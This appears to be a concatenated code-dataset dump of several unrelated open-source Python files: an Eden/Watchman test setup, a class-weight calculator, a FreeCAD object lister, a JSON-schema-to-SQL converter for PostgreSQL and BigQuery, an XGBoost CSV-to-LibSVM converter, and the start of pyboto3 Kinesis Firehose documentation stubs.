        self.addCleanup(lambda: self._restoreHome())
        # Watchman needs to start up with the same HOME as eden, otherwise
        # it won't be able to locate the eden socket
        self.eden_watchman = WatchmanInstance.Instance()
        self.eden_watchman.start()
        self.addCleanup(lambda: self.eden_watchman.stop())
        self.client = self.getClient(self.eden_watchman)
        # chg can interfere with eden, so disable it up front
        os.environ["CHGDISABLE"] = "1"
        self.eden = edenclient.EdenFS(
            self.eden_dir, etc_eden_dir=self.etc_eden_dir, home_dir=self.eden_home
        )
        self.eden.start()
        self.addCleanup(lambda: self.cleanUpEden())
    def _restoreHome(self):
        # type: () -> None
        # Restore the HOME that was saved (and replaced) in setUp.
        assert self.save_home is not None
        os.environ["HOME"] = self.save_home
    def cleanUpEden(self):
        # type: () -> None
        # Drop all watches first so eden can unmount cleanly, then shut down.
        assert self.eden is not None
        self.cleanUpWatches()
        self.eden.cleanup()
        self.eden = None
    def cleanUpWatches(self):
        # Remove every watchman watch and best-effort unmount each root.
        roots = self.watchmanCommand("watch-list")["roots"]
        self.watchmanCommand("watch-del-all")
        for root in roots:
            try:
                self.eden.unmount(root)
            except Exception:
                # Best effort: the root may not be an eden mount at all.
                pass
    def makeEdenMount(self, populate_fn=None):
        """Create a repo, register it with eden, and clone it into a mount.

        populate_fn is a function that accepts a repo object and
        that is expected to populate it as a pre-requisite to
        starting up the eden mount for it.  Returns the mount path.
        """
        repo_path = self.mkdtemp(prefix="eden_repo_")
        repo_name = os.path.basename(repo_path)
        repo = self.repoForPath(repo_path)
        repo.init()
        if populate_fn:
            populate_fn(repo)
        self.eden.add_repository(repo_name, repo_path)
        mount_path = os.path.join(self.mounts_dir, repo_name)
        self.eden.clone(repo_name, mount_path)
        return mount_path
    def repoForPath(self, path):
        # Hook point: subclasses may return a different repo implementation.
        return hgrepo.HgRepository(path)
    def setDefaultConfiguration(self):
        self.setConfiguration("local", "bser")
c0507348a2d55946052827fb1bafe46aaca313c8 | 1,145 | py | Python | src/calculate_class_weight.py | JanPalasek/sentiment-analysis-czech | 5e6efe74fa8250f5d1d0c9b02cf8f2271dbbbe87 | [
"MIT"
] | null | null | null | src/calculate_class_weight.py | JanPalasek/sentiment-analysis-czech | 5e6efe74fa8250f5d1d0c9b02cf8f2271dbbbe87 | [
"MIT"
] | null | null | null | src/calculate_class_weight.py | JanPalasek/sentiment-analysis-czech | 5e6efe74fa8250f5d1d0c9b02cf8f2271dbbbe87 | [
"MIT"
] | null | null | null | from sklearn.utils import class_weight
import numpy as np
import csv
import argparse
import json
if __name__ == "__main__":
    # Compute balanced class weights for a labeled CSV dataset and write
    # them into the "train.class_weight" section of a JSON config file.
    parser = argparse.ArgumentParser()
    parser.add_argument("--dataset_full_path", required=True, type=str)
    parser.add_argument("--config_path", required=True, type=str)
    args = parser.parse_args()

    # Collect the integer class labels; the "text" column is not needed here.
    labels = []
    with open(args.dataset_full_path) as csvfile:
        reader = csv.DictReader(csvfile)
        for row in reader:
            labels.append(int(row["label"]))

    unique_labels = np.unique(labels)
    # Keyword arguments are mandatory for scikit-learn >= 1.0 (positional
    # classes/y were removed). Use a distinct local name so the imported
    # `class_weight` module is not shadowed/rebound.
    weights = class_weight.compute_class_weight(
        class_weight="balanced", classes=unique_labels, y=labels
    )
    weights = np.around(weights, decimals=5)
    print("CLASS WEIGHT")
    print(weights)

    with open(args.config_path, "r") as file:
        config = json.load(file)
    with open(args.config_path, "w") as file:
        # np.float64 subclasses float, so json serializes the weights directly.
        class_weight_config = {
            str(label): weight for label, weight in zip(unique_labels, weights)
        }
        config["train"]["class_weight"] = class_weight_config
        json.dump(config, file, indent=2, sort_keys=True)
c224f1dca269cde07a3de1ce59f642e061774edd | 4,209 | py | Python | dev/freecad_test_body_objects/list_objects.py | s-light/io_import_fcstd | 3211961417ebc3f1c0cc4e192ebbc46aed419868 | [
"MIT"
] | 6 | 2019-10-31T01:20:33.000Z | 2022-02-02T01:38:08.000Z | dev/freecad_test_body_objects/list_objects.py | s-light/io_import_fcstd | 3211961417ebc3f1c0cc4e192ebbc46aed419868 | [
"MIT"
] | 13 | 2019-10-04T15:38:43.000Z | 2022-03-23T19:01:20.000Z | dev/freecad_test_body_objects/list_objects.py | s-light/io_import_fcstd | 3211961417ebc3f1c0cc4e192ebbc46aed419868 | [
"MIT"
] | 1 | 2019-10-04T23:40:20.000Z | 2019-10-04T23:40:20.000Z | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
List Objects.
Stand-alone
"""
import sys
import os
path_to_freecad = "/usr/lib/freecad-daily-python3/lib/FreeCAD.so"


def append_freecad_path():
    """Make the configured FreeCAD location importable via sys.path."""
    global path_to_freecad
    if not os.path.exists(path_to_freecad):
        print("FreeCAD path is not correct.")
        return
    if os.path.isfile(path_to_freecad):
        # A file was configured; use its containing directory instead.
        path_to_freecad = os.path.dirname(path_to_freecad)
    print("Configured FreeCAD path:", path_to_freecad)
    if path_to_freecad not in sys.path:
        sys.path.append(path_to_freecad)
# Import FreeCAD; if it is not on sys.path yet, append the configured
# location and retry. Failures are reported but do not abort the module.
try:
    try:
        import FreeCAD
    except ModuleNotFoundError:
        append_freecad_path()
        import FreeCAD  # noqa
    print("FreeCAD version:", FreeCAD.Version())
except ModuleNotFoundError as e:
    print("FreeCAD import failed.", e)
# ******************************************
def print_obj_header(
    pre_line="",
    show_lists=False,
    show_list_details=False,
):
    """Print the column header row for an object listing."""
    parts = [pre_line + "{:<15} {:<25} {:<25}".format("Label", "Name", "TypeId")]
    if show_lists:
        # Abbreviated count columns: Parents, InList, OutList, Group.
        parts.append("{:>2} {:>2} {:>2} {:>2}".format("P", "I", "O", "G"))
        if show_list_details:
            parts.append(
                (" {:<10}" * 4).format(
                    '[Parents]', '[InList]', '[OutList]', '[Group]'
                )
            )
    print("".join(parts))
def print_obj(
    obj,
    pre_line="",
    show_lists=False,
    show_list_details=False,
    end="\n",
):
    """Print a single FreeCAD-style object as one formatted row."""
    pieces = [pre_line + "{:<25} {:<15} {:<25}".format(obj.Label, obj.Name, obj.TypeId)]
    if show_lists:
        # Objects without a Group attribute show '_' in the group column.
        group_count = len(obj.Group) if hasattr(obj, 'Group') else '_'
        pieces.append(
            "{:>2} {:>2} {:>2} {:>2}".format(
                len(obj.Parents), len(obj.InList), len(obj.OutList), group_count
            )
        )
        if show_list_details:
            group = getattr(obj, 'Group', None)
            pieces.append(
                (" {:<10}" * 4).format(
                    str(obj.Parents), str(obj.InList), str(obj.OutList), str(group)
                )
            )
    print("".join(pieces), end=end)
def print_objects(
    objects,
    pre_line="",
    pre_list_entry="* ",
    show_lists=False,
    show_list_details=False,
):
    """Print a header followed by one formatted row per object."""
    # Indent the header by the width of the bullet so columns line up.
    header_prefix = pre_line + " " * len(pre_list_entry)
    print_obj_header(
        pre_line=header_prefix,
        show_lists=show_lists,
        show_list_details=show_list_details,
    )
    row_prefix = pre_line + pre_list_entry
    for entry in objects:
        print_obj(
            entry,
            pre_line=row_prefix,
            show_lists=show_lists,
            show_list_details=show_list_details,
        )
def print_obj_with_label(doc, label):
    """Look up an object by label in `doc` and print it, or report a miss."""
    matches = doc.getObjectsByLabel(label)
    # print(matches)
    if not matches:
        print("object with label '{}' not found.".format(label))
    else:
        print_obj(matches[0])
# ******************************************
#
# Main experiments
#
# ******************************************
# Open the sample document, list its objects, look up a few by label,
# then close it again.
doc = FreeCAD.open(
    "./BodyTest.FCStd"
)
docname = doc.Name
# ******************************************
print("~"*42)
objects = doc.Objects
print("doc.Objects", len(objects))
print_objects(objects)
print("~"*42)
print_obj_with_label(doc, "BodyTest_Part")
print_obj_with_label(doc, "Body_Hex")
print_obj_with_label(doc, "Sphere_Sun")
print("~"*42)
print("tests done :-)")
FreeCAD.closeDocument(docname)
| 22.508021 | 65 | 0.476598 |
45269b3ea1719b4ff0b963029c7baabf9cbbc44c | 11,099 | py | Python | mara_singer/schema.py | hz-lschick/mara-singer | 733cf407a3a9aa494204c0d681f52b9017fc9e2e | [
"MIT"
] | 1 | 2020-10-14T03:38:52.000Z | 2020-10-14T03:38:52.000Z | mara_singer/schema.py | hz-lschick/mara-singer | 733cf407a3a9aa494204c0d681f52b9017fc9e2e | [
"MIT"
] | 11 | 2020-07-22T09:57:58.000Z | 2020-11-19T13:45:15.000Z | mara_singer/schema.py | hz-lschick/mara-singer | 733cf407a3a9aa494204c0d681f52b9017fc9e2e | [
"MIT"
] | null | null | null | from functools import singledispatch
from mara_db import dbs
@singledispatch
def jsonschema_to_sql_create_table(
    db: object,
    jsonschema,
    table_name: str = None,
    key_properties: [str] = None,
    properties: [str] = None,
    create_if_not_exists: bool = False,
) -> str:
    """Render a SQL CREATE TABLE statement from a JSON schema.

    Single-dispatch fallback: concrete db types register their own
    implementations; calling with an unregistered type raises.

    Args:
        db: The destination db object
        jsonschema: The JSON schema.
        table_name: The destination table name.
        key_properties: (Optional) Key properties; always included and NOT NULL.
        properties: (Optional) Properties to add; all when omitted
            (key_properties are always added).
        create_if_not_exists: Emit 'CREATE TABLE IF NOT EXISTS' when True.
    """
    raise NotImplementedError(f'Please implement jsonschema_to_sql_create_table for type "{db.__class__.__name__}"')
@jsonschema_to_sql_create_table.register(str)
def __(alias: str, jsonschema, table_name: str = None, key_properties: [str] = None, properties: [str] = None, create_if_not_exists: bool = False) -> str:
    # String overload: resolve the db alias via mara_db, then dispatch again
    # on the concrete db object.
    return jsonschema_to_sql_create_table(dbs.db(alias), jsonschema=jsonschema, table_name=table_name, key_properties=key_properties, properties=properties, create_if_not_exists=create_if_not_exists)
@jsonschema_to_sql_create_table.register(dbs.PostgreSQLDB)
def __(db: dbs.PostgreSQLDB, jsonschema, table_name: str = None, key_properties: [str] = None, properties: [str] = None, create_if_not_exists: bool = False):
    """Render a PostgreSQL CREATE TABLE statement from a JSON object schema."""
    schema_type = jsonschema.get('type')
    if schema_type != 'object' and schema_type != ['null', 'object']:
        raise Exception('The JSON schema must be of type object to be convertable to a SQL table')
    if jsonschema.get('additionalProperties') == True:
        raise Exception('The JSON schema must not allow additional properties in its main object to be convertable to a SQL table')

    def wanted(name):
        # No explicit selection means every property; key properties always stay.
        if not properties:
            return True
        return name in properties or (key_properties and name in key_properties)

    fields = [
        _jsonschema_property_to_sql_field_definition(db, name, definition, key_properties)
        for name, definition in jsonschema['properties'].items()
        if wanted(name)
    ]
    create_clause = 'CREATE TABLE IF NOT EXISTS' if create_if_not_exists else 'CREATE TABLE'
    return '{} {} (\n {}\n)'.format(create_clause, table_name, ',\n '.join(fields))
@jsonschema_to_sql_create_table.register(dbs.BigQueryDB)
def __(db: dbs.BigQueryDB, jsonschema, table_name: str = None, key_properties: [str] = None, properties: [str] = None, create_if_not_exists: bool = False):
    """Render a BigQuery CREATE TABLE statement from a JSON object schema."""
    if jsonschema.get('type') not in ('object', ['null', 'object']):
        raise Exception('The JSON schema must be of type object to be convertable to a SQL table')
    if jsonschema.get('additionalProperties') == True:
        raise Exception('The JSON schema must not allow additional properties in its main object to be convertable to a SQL table')
    column_definitions = []
    for prop_name, prop_schema in jsonschema['properties'].items():
        is_key = key_properties and prop_name in key_properties
        # Skip unselected properties, but key properties are always kept.
        if properties and prop_name not in properties and not is_key:
            continue
        column_definitions.append(
            _jsonschema_property_to_sql_field_definition(db, prop_name, prop_schema, key_properties))
    prefix = 'CREATE TABLE'
    if create_if_not_exists:
        prefix += ' IF NOT EXISTS'
    return prefix + ' {} (\n {}\n)'.format(table_name, ',\n '.join(column_definitions))
@singledispatch
def _jsonschema_property_type_to_db_type(db: object, type: str, format: str = None):
    """Map a JSON-schema scalar type (and optional format) to the db column type.

    Single-dispatch fallback: raises for db types without a registered mapping.
    """
    # Fixed: the message previously named a nonexistent function
    # "_jsonschema_property_type_map".
    raise NotImplementedError(f'Please implement _jsonschema_property_type_to_db_type for type "{db.__class__.__name__}"')
@_jsonschema_property_type_to_db_type.register(dbs.PostgreSQLDB)
def __(db: dbs.PostgreSQLDB, type, format = None):
    """Map a JSON-schema type/format to a PostgreSQL column type.

    Raises for any combination that has no mapping.
    """
    if type == 'string':
        if format == 'date':
            return 'DATE'
        if format == 'date-time':
            return 'TIMESTAMP'
        return 'TEXT'
    if type == 'boolean':
        return 'BOOLEAN'
    if type == 'integer':
        return 'BIGINT'
    if type == 'number':
        # Added for consistency with the BigQuery mapping: JSON-schema
        # 'number' becomes an arbitrary-precision NUMERIC column.
        return 'NUMERIC'
    raise Exception(f'Could not map type \'{type}\' with format \'{format}\'')
@_jsonschema_property_type_to_db_type.register(dbs.BigQueryDB)
def __(db: dbs.BigQueryDB, type, format = None):
    """Map a JSON-schema type/format to a BigQuery column type."""
    if type == 'string':
        # Only string types carry a format; date/date-time get temporal columns.
        if format == 'date':
            return 'DATE'
        if format == 'date-time':
            return 'TIMESTAMP'
        return 'STRING'
    simple_types = {'boolean': 'BOOL', 'integer': 'INT64', 'number': 'NUMERIC'}
    if type in simple_types:
        return simple_types[type]
    raise Exception(f'Could not map type \'{type}\' with format \'{format}\'')
@singledispatch
def _jsonschema_property_to_sql_field_definition(db: object, property_name, property_definition, key_properties: [str] = None, ignore_nullable: bool = False):
    """Render one JSON-schema property as a SQL column definition.

    Single-dispatch fallback: raises for db types without a registered mapping.
    """
    raise NotImplementedError(f'Please implement _jsonschema_property_to_sql_field_definition for type "{db.__class__.__name__}"')
@_jsonschema_property_to_sql_field_definition.register(dbs.PostgreSQLDB)
def __(db: dbs.PostgreSQLDB, property_name, property_definition, key_properties: [str] = None, ignore_nullable: bool = False):
    """Render one JSON-schema property as a PostgreSQL column definition.

    Returns just the type when property_name is falsy (used recursively for
    array item types), otherwise '<name> <type>[ NOT NULL]'.
    """
    field_type = None
    is_nullable = None
    if not field_type and 'type' in property_definition:
        # 'type' may be a single string or a list (e.g. ['null', 'integer']).
        if isinstance(property_definition['type'], list):
            typeList = property_definition['type']
        else:
            typeList = [property_definition['type']]
        for type in typeList:
            if type == "null":
                is_nullable = True
            elif type == "object":
                raise NotImplementedError('JSON object type --> Composite type creation is not yet implemented for PostgreSQLDB')
            elif type == "array":
                if 'items' in property_definition:
                    # Recurse for the element type; property_name=None yields a bare type.
                    field_type = '{}[]'.format(_jsonschema_property_to_sql_field_definition(db, property_name=None, property_definition=property_definition['items']))
            else:
                # hack for tap-adwords:
                if field_type:
                    continue # sometimes e.g. tap-adwords has 'null, integer, string' as a type --> is the money type. We assume here always to use the integer value
                if 'format' in property_definition:
                    field_type = _jsonschema_property_type_to_db_type(db, type=type, format=property_definition['format'])
                else:
                    field_type = _jsonschema_property_type_to_db_type(db, type=type)
    if not field_type and 'anyOf' in property_definition:
        if property_definition['anyOf'][0]['type'] != "array":
            # Fixed: raising a plain string is a TypeError in Python 3.
            raise Exception("Unexpected type for property {}".format(property_name))
        field_type = '{}[]'.format(property_definition['anyOf'][0]['items']['type'])
        if property_definition['anyOf'][1]['type'] == "null":
            is_nullable = True
    if not field_type:
        raise Exception(f'Could not determine field type for property {property_name}')
    # Key properties must always be provided, so they are never nullable.
    if is_nullable and key_properties and property_name in key_properties:
        is_nullable = False
    if is_nullable and not ignore_nullable:
        if not property_name:
            return field_type
        return '{} {}'.format(property_name, field_type)
    else:
        if not property_name:
            return field_type
        return '{} {} NOT NULL'.format(property_name, field_type)
@_jsonschema_property_to_sql_field_definition.register(dbs.BigQueryDB)
def __(db: dbs.BigQueryDB, property_name, property_definition, key_properties: [str] = None, ignore_nullable: bool = False):
    """Render one JSON-schema property as a BigQuery column definition.

    Nested objects become STRUCT<...>, arrays become ARRAY<...>. Returns just
    the type when property_name is falsy (used recursively), otherwise
    '<name> <type>[ NOT NULL]'.
    """
    field_type = None
    is_nullable = None
    if not field_type and 'type' in property_definition:
        # 'type' may be a single string or a list (e.g. ['null', 'integer']).
        if isinstance(property_definition['type'], list):
            typeList = property_definition['type']
        else:
            typeList = [property_definition['type']]
        for type in typeList:
            if type == "null":
                is_nullable = True
            elif type == "object":
                if 'properties' in property_definition:
                    sub_properties = []
                    for sub_property_name, sub_property_definition in property_definition['properties'].items():
                        sub_properties.append(_jsonschema_property_to_sql_field_definition(db, property_name=sub_property_name, property_definition=sub_property_definition))
                    if len(sub_properties) == 0:
                        # An object with no declared properties is stored opaquely.
                        field_type = 'STRING'
                    else:
                        field_type = 'STRUCT<{}>'.format(', '.join(sub_properties))
                else:
                    raise Exception(f'Unknown usage of type {type} for property {property_name}')
            elif type == "array":
                if 'items' in property_definition:
                    # Recurse for the element type; property_name=None yields a bare type.
                    field_type = 'ARRAY<{}>'.format(_jsonschema_property_to_sql_field_definition(db, property_name=None, property_definition=property_definition['items']))
            else:
                # hack for tap-adwords:
                if field_type:
                    continue # sometimes e.g. tap-adwords has 'null, integer, string' as a type --> is the money type. We assume here always to use the integer value
                if 'format' in property_definition:
                    field_type = _jsonschema_property_type_to_db_type(db, type=type, format=property_definition['format'])
                else:
                    field_type = _jsonschema_property_type_to_db_type(db, type=type)
    if not field_type and 'anyOf' in property_definition:
        if property_definition['anyOf'][0]['type'] != "array":
            # Fixed: raising a plain string is a TypeError in Python 3.
            raise Exception("Unexpected type for property {}".format(property_name))
        field_type = 'ARRAY<{}>'.format(property_definition['anyOf'][0]['items']['type'])
        if property_definition['anyOf'][1]['type'] == "null":
            is_nullable = True
    if not field_type:
        raise Exception(f'Could not determine field type for property {property_name}')
    # Key properties must always be provided, so they are never nullable.
    if is_nullable and key_properties and property_name in key_properties:
        is_nullable = False
    # Big Query does not support NOT NULL arrays. When you try to create a column with ARRAY<> NOT NULL, you get the error:
    # NOT NULL cannot be applied to ARRAY field '<COLUMN_NAME>'. NULL arrays are always stored as an empty array.
    if str.startswith(field_type, 'ARRAY') and not is_nullable:
        is_nullable = True
    if is_nullable and not ignore_nullable:
        if not property_name:
            return field_type
        return '{} {}'.format(property_name, field_type)
    else:
        if not property_name:
            return field_type
        return '{} {} NOT NULL'.format(property_name, field_type)
| 49.328889 | 199 | 0.669249 |
828c95495f29c8a0e292de686d8856c4a5975083 | 207 | py | Python | demo/CLI/yearpredMSD/csv2libsvm.py | bclehmann/xgboost | 345796825f7bbeb0251bca1244e296fda211551b | [
"Apache-2.0"
] | 27 | 2018-11-11T12:55:10.000Z | 2021-11-15T01:43:01.000Z | demo/CLI/yearpredMSD/csv2libsvm.py | bclehmann/xgboost | 345796825f7bbeb0251bca1244e296fda211551b | [
"Apache-2.0"
] | 10 | 2018-12-06T18:50:21.000Z | 2021-11-08T16:34:47.000Z | demo/CLI/yearpredMSD/csv2libsvm.py | bclehmann/xgboost | 345796825f7bbeb0251bca1244e296fda211551b | [
"Apache-2.0"
] | 15 | 2019-01-25T18:21:39.000Z | 2021-12-15T14:47:03.000Z | import sys
fo = open(sys.argv[2], 'w')
for l in open(sys.argv[1]):
arr = l.split(',')
fo.write('%s' % arr[0])
for i in range(len(arr) - 1):
fo.write(' %d:%s' % (i, arr[i+1]))
fo.close()
| 20.7 | 42 | 0.497585 |
b2c8621d33ec4d83b0186232c3d517951ec2d31d | 279,299 | py | Python | pyboto3/firehose.py | gehad-shaat/pyboto3 | 4a0c2851a8bc04fb1c71c36086f7bb257e48181d | [
"MIT"
] | 91 | 2016-12-31T11:38:37.000Z | 2021-09-16T19:33:23.000Z | pyboto3/firehose.py | gehad-shaat/pyboto3 | 4a0c2851a8bc04fb1c71c36086f7bb257e48181d | [
"MIT"
] | 7 | 2017-01-02T18:54:23.000Z | 2020-08-11T13:54:02.000Z | pyboto3/firehose.py | gehad-shaat/pyboto3 | 4a0c2851a8bc04fb1c71c36086f7bb257e48181d | [
"MIT"
] | 26 | 2016-12-31T13:11:00.000Z | 2022-03-03T21:01:12.000Z | '''
The MIT License (MIT)
Copyright (c) 2016 WavyCloud
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.
'''
def can_paginate(operation_name=None):
    """
    Check if an operation can be paginated.

    :type operation_name: string
    :param operation_name: The operation name. This is the same name
        as the method name on the client. For example, if the method
        name is create_foo, and you'd normally invoke the operation as
        client.create_foo(**kwargs), if the create_foo operation can
        be paginated, you can use the call
        client.get_paginator('create_foo').
    """
    # Documentation stub only (pyboto3); performs no work.
def create_delivery_stream(DeliveryStreamName=None, DeliveryStreamType=None, KinesisStreamSourceConfiguration=None, DeliveryStreamEncryptionConfigurationInput=None, S3DestinationConfiguration=None, ExtendedS3DestinationConfiguration=None, RedshiftDestinationConfiguration=None, ElasticsearchDestinationConfiguration=None, SplunkDestinationConfiguration=None, Tags=None):
"""
Creates a Kinesis Data Firehose delivery stream.
By default, you can create up to 50 delivery streams per AWS Region.
This is an asynchronous operation that immediately returns. The initial status of the delivery stream is CREATING . After the delivery stream is created, its status is ACTIVE and it now accepts data. If the delivery stream creation fails, the status transitions to CREATING_FAILED . Attempts to send data to a delivery stream that is not in the ACTIVE state cause an exception. To check the state of a delivery stream, use DescribeDeliveryStream .
If the status of a delivery stream is CREATING_FAILED , this status doesn\'t change, and you can\'t invoke CreateDeliveryStream again on it. However, you can invoke the DeleteDeliveryStream operation to delete it.
A Kinesis Data Firehose delivery stream can be configured to receive records directly from providers using PutRecord or PutRecordBatch , or it can be configured to use an existing Kinesis stream as its source. To specify a Kinesis data stream as input, set the DeliveryStreamType parameter to KinesisStreamAsSource , and provide the Kinesis stream Amazon Resource Name (ARN) and role ARN in the KinesisStreamSourceConfiguration parameter.
To create a delivery stream with server-side encryption (SSE) enabled, include DeliveryStreamEncryptionConfigurationInput in your request. This is optional. You can also invoke StartDeliveryStreamEncryption to turn on SSE for an existing delivery stream that doesn\'t have SSE enabled.
A delivery stream is configured with a single destination: Amazon S3, Amazon ES, Amazon Redshift, or Splunk. You must specify only one of the following destination configuration parameters: ExtendedS3DestinationConfiguration , S3DestinationConfiguration , ElasticsearchDestinationConfiguration , RedshiftDestinationConfiguration , or SplunkDestinationConfiguration .
When you specify S3DestinationConfiguration , you can also provide the following optional values: BufferingHints, EncryptionConfiguration , and CompressionFormat . By default, if no BufferingHints value is provided, Kinesis Data Firehose buffers data up to 5 MB or for 5 minutes, whichever condition is satisfied first. BufferingHints is a hint, so there are some cases where the service cannot adhere to these conditions strictly. For example, record boundaries might be such that the size is a little over or under the configured buffering size. By default, no encryption is performed. We strongly recommend that you enable encryption to ensure secure data storage in Amazon S3.
A few notes about Amazon Redshift as a destination:
Kinesis Data Firehose assumes the IAM role that is configured as part of the destination. The role should allow the Kinesis Data Firehose principal to assume the role, and the role should have permissions that allow the service to deliver the data. For more information, see Grant Kinesis Data Firehose Access to an Amazon S3 Destination in the Amazon Kinesis Data Firehose Developer Guide .
See also: AWS API Documentation
Exceptions
:example: response = client.create_delivery_stream(
DeliveryStreamName='string',
DeliveryStreamType='DirectPut'|'KinesisStreamAsSource',
KinesisStreamSourceConfiguration={
'KinesisStreamARN': 'string',
'RoleARN': 'string'
},
DeliveryStreamEncryptionConfigurationInput={
'KeyARN': 'string',
'KeyType': 'AWS_OWNED_CMK'|'CUSTOMER_MANAGED_CMK'
},
S3DestinationConfiguration={
'RoleARN': 'string',
'BucketARN': 'string',
'Prefix': 'string',
'ErrorOutputPrefix': 'string',
'BufferingHints': {
'SizeInMBs': 123,
'IntervalInSeconds': 123
},
'CompressionFormat': 'UNCOMPRESSED'|'GZIP'|'ZIP'|'Snappy'|'HADOOP_SNAPPY',
'EncryptionConfiguration': {
'NoEncryptionConfig': 'NoEncryption',
'KMSEncryptionConfig': {
'AWSKMSKeyARN': 'string'
}
},
'CloudWatchLoggingOptions': {
'Enabled': True|False,
'LogGroupName': 'string',
'LogStreamName': 'string'
}
},
ExtendedS3DestinationConfiguration={
'RoleARN': 'string',
'BucketARN': 'string',
'Prefix': 'string',
'ErrorOutputPrefix': 'string',
'BufferingHints': {
'SizeInMBs': 123,
'IntervalInSeconds': 123
},
'CompressionFormat': 'UNCOMPRESSED'|'GZIP'|'ZIP'|'Snappy'|'HADOOP_SNAPPY',
'EncryptionConfiguration': {
'NoEncryptionConfig': 'NoEncryption',
'KMSEncryptionConfig': {
'AWSKMSKeyARN': 'string'
}
},
'CloudWatchLoggingOptions': {
'Enabled': True|False,
'LogGroupName': 'string',
'LogStreamName': 'string'
},
'ProcessingConfiguration': {
'Enabled': True|False,
'Processors': [
{
'Type': 'Lambda',
'Parameters': [
{
'ParameterName': 'LambdaArn'|'NumberOfRetries'|'RoleArn'|'BufferSizeInMBs'|'BufferIntervalInSeconds',
'ParameterValue': 'string'
},
]
},
]
},
'S3BackupMode': 'Disabled'|'Enabled',
'S3BackupConfiguration': {
'RoleARN': 'string',
'BucketARN': 'string',
'Prefix': 'string',
'ErrorOutputPrefix': 'string',
'BufferingHints': {
'SizeInMBs': 123,
'IntervalInSeconds': 123
},
'CompressionFormat': 'UNCOMPRESSED'|'GZIP'|'ZIP'|'Snappy'|'HADOOP_SNAPPY',
'EncryptionConfiguration': {
'NoEncryptionConfig': 'NoEncryption',
'KMSEncryptionConfig': {
'AWSKMSKeyARN': 'string'
}
},
'CloudWatchLoggingOptions': {
'Enabled': True|False,
'LogGroupName': 'string',
'LogStreamName': 'string'
}
},
'DataFormatConversionConfiguration': {
'SchemaConfiguration': {
'RoleARN': 'string',
'CatalogId': 'string',
'DatabaseName': 'string',
'TableName': 'string',
'Region': 'string',
'VersionId': 'string'
},
'InputFormatConfiguration': {
'Deserializer': {
'OpenXJsonSerDe': {
'ConvertDotsInJsonKeysToUnderscores': True|False,
'CaseInsensitive': True|False,
'ColumnToJsonKeyMappings': {
'string': 'string'
}
},
'HiveJsonSerDe': {
'TimestampFormats': [
'string',
]
}
}
},
'OutputFormatConfiguration': {
'Serializer': {
'ParquetSerDe': {
'BlockSizeBytes': 123,
'PageSizeBytes': 123,
'Compression': 'UNCOMPRESSED'|'GZIP'|'SNAPPY',
'EnableDictionaryCompression': True|False,
'MaxPaddingBytes': 123,
'WriterVersion': 'V1'|'V2'
},
'OrcSerDe': {
'StripeSizeBytes': 123,
'BlockSizeBytes': 123,
'RowIndexStride': 123,
'EnablePadding': True|False,
'PaddingTolerance': 123.0,
'Compression': 'NONE'|'ZLIB'|'SNAPPY',
'BloomFilterColumns': [
'string',
],
'BloomFilterFalsePositiveProbability': 123.0,
'DictionaryKeyThreshold': 123.0,
'FormatVersion': 'V0_11'|'V0_12'
}
}
},
'Enabled': True|False
}
},
RedshiftDestinationConfiguration={
'RoleARN': 'string',
'ClusterJDBCURL': 'string',
'CopyCommand': {
'DataTableName': 'string',
'DataTableColumns': 'string',
'CopyOptions': 'string'
},
'Username': 'string',
'Password': 'string',
'RetryOptions': {
'DurationInSeconds': 123
},
'S3Configuration': {
'RoleARN': 'string',
'BucketARN': 'string',
'Prefix': 'string',
'ErrorOutputPrefix': 'string',
'BufferingHints': {
'SizeInMBs': 123,
'IntervalInSeconds': 123
},
'CompressionFormat': 'UNCOMPRESSED'|'GZIP'|'ZIP'|'Snappy'|'HADOOP_SNAPPY',
'EncryptionConfiguration': {
'NoEncryptionConfig': 'NoEncryption',
'KMSEncryptionConfig': {
'AWSKMSKeyARN': 'string'
}
},
'CloudWatchLoggingOptions': {
'Enabled': True|False,
'LogGroupName': 'string',
'LogStreamName': 'string'
}
},
'ProcessingConfiguration': {
'Enabled': True|False,
'Processors': [
{
'Type': 'Lambda',
'Parameters': [
{
'ParameterName': 'LambdaArn'|'NumberOfRetries'|'RoleArn'|'BufferSizeInMBs'|'BufferIntervalInSeconds',
'ParameterValue': 'string'
},
]
},
]
},
'S3BackupMode': 'Disabled'|'Enabled',
'S3BackupConfiguration': {
'RoleARN': 'string',
'BucketARN': 'string',
'Prefix': 'string',
'ErrorOutputPrefix': 'string',
'BufferingHints': {
'SizeInMBs': 123,
'IntervalInSeconds': 123
},
'CompressionFormat': 'UNCOMPRESSED'|'GZIP'|'ZIP'|'Snappy'|'HADOOP_SNAPPY',
'EncryptionConfiguration': {
'NoEncryptionConfig': 'NoEncryption',
'KMSEncryptionConfig': {
'AWSKMSKeyARN': 'string'
}
},
'CloudWatchLoggingOptions': {
'Enabled': True|False,
'LogGroupName': 'string',
'LogStreamName': 'string'
}
},
'CloudWatchLoggingOptions': {
'Enabled': True|False,
'LogGroupName': 'string',
'LogStreamName': 'string'
}
},
ElasticsearchDestinationConfiguration={
'RoleARN': 'string',
'DomainARN': 'string',
'ClusterEndpoint': 'string',
'IndexName': 'string',
'TypeName': 'string',
'IndexRotationPeriod': 'NoRotation'|'OneHour'|'OneDay'|'OneWeek'|'OneMonth',
'BufferingHints': {
'IntervalInSeconds': 123,
'SizeInMBs': 123
},
'RetryOptions': {
'DurationInSeconds': 123
},
'S3BackupMode': 'FailedDocumentsOnly'|'AllDocuments',
'S3Configuration': {
'RoleARN': 'string',
'BucketARN': 'string',
'Prefix': 'string',
'ErrorOutputPrefix': 'string',
'BufferingHints': {
'SizeInMBs': 123,
'IntervalInSeconds': 123
},
